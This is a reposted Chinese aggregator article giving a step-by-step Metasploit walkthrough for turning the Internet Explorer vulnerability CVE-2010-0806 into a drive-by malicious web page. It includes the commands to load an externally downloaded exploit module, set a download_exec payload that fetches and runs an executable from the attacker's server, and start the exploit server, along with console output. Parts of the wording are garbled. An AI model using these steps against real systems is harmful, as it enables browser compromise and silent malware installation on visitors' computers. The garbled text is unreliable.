用Metasploit生成办法 关于近来那个网马0day(CVE-2010-0806)[网络技术]
本文“用Metasploit生成办法 关于近来那个网马0day(CVE-2010-0806)[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
1、下载http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb
2、放到C:\Metasploit\Framework3\msf3\modules\exploits\test.我改个了名字叫ie.rb
3、启动msfconsole
4、msf > use exploit/test/ie
msf exploit(ie) > show optinos
回显:
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0
msf exploit(ie) > set srvhost 192.168.0.3
srvhost => 192.168.0.3
msf exploit(ie) > set srvport 8080
srvport => 8080
msf exploit(ie) > set payload windows/download_exec
payload => windows/download_exec
msf exploit(ie) > set url http://192.168.0.3/demo.exe
url => http://192.168.0.3/demo.exe
msf exploit(ie) > exploit
[*] Exploit running as background job.
msf exploit(ie) >
[*] Using URL: http://192.168.0.3:8080/4rJ0JRSnX55wAY
[*] Server started.
然后翻开http://192.168.0.3:8080/4rJ0JRSnX55wAY,你便可以看到源码了.
红字是号令,别的的是回显
以上是“用Metasploit生成办法 关于近来那个网马0day(CVE-2010-0806)[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |